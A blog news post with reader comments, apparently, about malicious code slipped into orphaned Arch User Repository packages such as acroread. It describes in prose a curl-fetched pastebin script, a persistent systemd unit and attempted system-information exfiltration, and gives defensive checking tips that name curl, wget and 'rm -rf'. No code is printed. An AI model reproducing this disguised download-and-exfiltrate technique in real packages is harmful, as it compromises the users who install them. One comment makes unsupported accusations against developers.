Malware Found On The Arch User Repository (AUR)

Arch Linux logo

On July 7, an AUR package was modified with some malicious code, reminding Arch Linux users (and Linux users in general) that all user-generated packages should be checked (when possible) before installation.

AUR, or the Arch (Linux) User Repository contains package descriptions, also known as PKGBUILDs, which make compiling packages from source easier. While these packages are very useful, they should never be treated as safe, and users should always check their contents before using them, when possible. After all, the AUR webpage states in bold that "AUR packages are user produced content. Any use of the provided files is at your own risk."

The discovery of an AUR package containing malicious code proves this. acroread was modified on July 7 (it appears it was previously "orphaned", meaning it had no maintainer) by an user named "xeactor" to include a curl command that downloaded a script from a pastebin. The script then downloaded another script and installed a systemd unit to run that script periodically.

It appears two other AUR packages were modified in the same way. All the offending packages were removed and the user account (which was registered in the same day those packages were updated) that was used to upload them was suspended.

The malicious code didn't do anything truly harmful - it only tried to upload some system information, like the machine ID, the output of uname -a (which includes the kernel version, architecture, etc.), CPU information, pacman information, and the output of systemctl list-units (which lists systemd units information) to I'm saying "tried" because no system information was actually uploaded due to an error in the second script (the upload function is called "upload", but the script tried to call it using a different name, "uploader").

Also, the person adding these malicious scripts to AUR left the personal Pastebin API key in the script in cleartext, proving once again that they don't know exactly what they are doing.

The purpose for trying to upload this information to Pastebin is not clear, especially since much more sensitive data could have been uploaded, like GPG / SSH keys.

Update: Reddit user u/xanaxdroid_ mentions that the same user named "xeactor" also had some cryptocurrency mining packages posted, so he speculates that "xeactor" was probably planning on adding some hidden cryptocurrency mining software to AUR (this was also the case with some Ubuntu Snap packages two months ago). That's why "xeactor" was probably trying to obtain various system information. All the packages uploaded by this AUR user have been removed so I cannot check this.

Another update: What exactly should you check in user-generated packages such as those found in AUR? This varies and I can't tell you exactly but you can start by looking for anything that tries to download something using curl, wget and other similar tools, and see what exactly they are attempting to download. Also check the server from which the package source is downloaded from and make sure it's the official source. Unfortunately this is not an exact 'science'. For Launchpad PPAs for example, things get more complicated as you must know how Debian packaging works, and the source can be altered directly as it's hosted in the PPA and uploaded by the user. It gets even more complicated with Snap packages, because you cannot check such packages before installation (as far as I know). In these latter cases, and as a generic solution, I guess you should only install user-generated packages if you trust the uploader / packager.

from Reddit


  1. A small typo - It was on July 7 - not June.
    The malicious script was removed within approx. 9 hours

  2. The package name is acroread, as a shortening for Acrobat Reader, not acrored.

  3. Wow! Who is checking the packages for malicious code? That's really quick response. But I wonder if it's possible that there are undiscovered malicious packages.

  4. Quote: " But I wonder if it's possible that there are undiscovered malicious packages."

    It's all about trust. Wonder what percentage of Arch users are capable of questioning, and then actually being capable of checking and finding malware in compiled languages like C in official and or AUR packages?

    I am migrating to Fedora because of recent discoveries I have made involving lead pacman and Arch project devs, managers.

    I no longer trust either of these people based on empirical evidence from past behavior, available for anyone to read who is curious enough to discover the truth.

  5. Forgot to include, "as a user with 9 years of Arch usage" to above.

    1. never forget appeal to authority, that's the most important part of making an argument with no sources.

  6. This is less about scanning huge amounts of C or other code. More about checking a small AUR build script does not download anything from an unexplainable source, and does not run anything nasty such as "rm -rf".

    Most Arch users should be competent to do that.

  7. I'm now very curious about the allegations being levied against people I rely on, but when it comes to the AUR, there's no relation to these project leaders. There's no guarantees, or even implied guarantees when it comes to almost all Linux distros. But when it comes to the AUR, it's pretty much the wild west, it's a bunch of recipes and sources, and it's dangerous to Arch in the same way PPA's are dangerous to Ubuntu.


Powered by Blogger.